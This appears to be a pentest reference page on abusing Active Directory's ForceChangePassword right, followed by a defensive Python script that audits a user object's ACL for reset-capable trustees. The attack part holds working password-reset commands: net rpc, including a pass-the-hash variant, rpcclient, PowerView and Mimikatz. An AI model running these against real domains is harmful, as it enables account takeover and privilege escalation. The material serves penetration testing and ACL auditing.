ForceChangePassword
This abuse can be carried out when controlling an object that has AllExtendedRights or GenericAll over a target user.
UNIX-like
It can also be achieved from a UNIX-like system with net, a tool for the administration of Samba and CIFS/SMB clients. The pth-toolkit can also be used to run net commands with pass-the-hash.
# With net and cleartext credentials (will be prompted)
net rpc password $TargetUser -U $DOMAIN/$ControlledUser -S $DomainController

# With net and cleartext credentials
net rpc password $TargetUser -U $DOMAIN/$ControlledUser%$Password -S $DomainController

# With Pass-the-Hash
pth-net rpc password $TargetUser -U $DOMAIN/$ControlledUser%ffffffffffffffffffffffffffffffff:$NThash -S $DomainController
The rpcclient can also be used on UNIX-like systems when the package samba-common-bin is missing.
rpcclient -U $DOMAIN/$ControlledUser $DomainController
rpcclient $> setuserinfo2 $TargetUser 23 $NewPassword
Windows
The attacker can change the password of the user. This can be achieved with Set-DomainUserPassword (PowerView module).
$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword
Mimikatz's lsadump::setntlm can also be used for that purpose.
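As an added example (not part of the original page), an ACL audit for the prerequisite stated at the top: it parses the DACL of a user object and lists the trustees holding GenericAll, AllExtendedRights or the ForceChangePassword extended right. It assumes the object's security descriptor has already been exported as an SDDL string; the sample SDDL, the SIDs and the allow-list are constructed, and deny and conditional ACEs are not evaluated.

```python
import re

# rightsGuid of the User-Force-Change-Password extended right (AD schema)
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"
BITS = {"CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
        "DT": 0x40, "LO": 0x80, "CR": 0x100, "SD": 0x10000, "RC": 0x20000,
        "WD": 0x40000, "WO": 0x80000, "GA": 0x10000000}
CONTROL_ACCESS, GENERIC_ALL, FULL_CONTROL = 0x100, 0x10000000, 0xF01FF
DOM = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID
# Constructed sample: security descriptor of a user object, in SDDL form
SAMPLE = ("O:DAG:DAD:AI"
          "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)"      # full control
          f"(OA;;CR;00299570-246D-11D0-A768-00AA006E0529;;{DOM}-1105)"
          f"(A;;CR;;;{DOM}-1106)"                      # CR without object GUID
          f"(OA;CIIO;CR;{FORCE_CHANGE_PASSWORD};;{DOM}-1107)"  # inherit-only
          "(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)"  # User-Change-Password
          "(A;;0x10000000;;;SY)"                       # GENERIC_ALL in hex form
          "(A;;RPRC;;;AU)")                            # read only

def pairs(s):
    return [s[i:i + 2] for i in range(0, len(s), 2)]

def rights_mask(rights):
    if rights.lower().startswith("0x"):  # numeric form of the access mask
        return int(rights, 16)
    mask = 0
    for token in pairs(rights):
        mask |= BITS.get(token, 0)
    return mask

def reset_capable(sddl):
    """Return [(trustee, right)] for allow ACEs that permit a password reset."""
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1) if dacl else ""):
        ace_type, flags, rights, guid, _inherit_guid, trustee = ace.split(";")[:6]
        if ace_type not in ("A", "OA") or "IO" in pairs(flags):
            continue  # deny/audit ACEs and inherit-only ACEs grant nothing here
        mask = rights_mask(rights)
        if not guid and (mask & GENERIC_ALL or (mask & FULL_CONTROL) == FULL_CONTROL):
            findings.append((trustee, "GenericAll"))
        elif mask & CONTROL_ACCESS and not guid:
            findings.append((trustee, "AllExtendedRights"))
        elif mask & CONTROL_ACCESS and guid.lower() == FORCE_CHANGE_PASSWORD:
            findings.append((trustee, "ForceChangePassword"))
    return findings

def unexpected(sddl, expected):
    """Findings whose trustee is not on the allow-list (hypothetical policy)."""
    return [f for f in reset_capable(sddl) if f[0] not in expected]
```

The User-Change-Password ACE for Everyone is deliberately not reported: that right requires knowledge of the current password, unlike a reset.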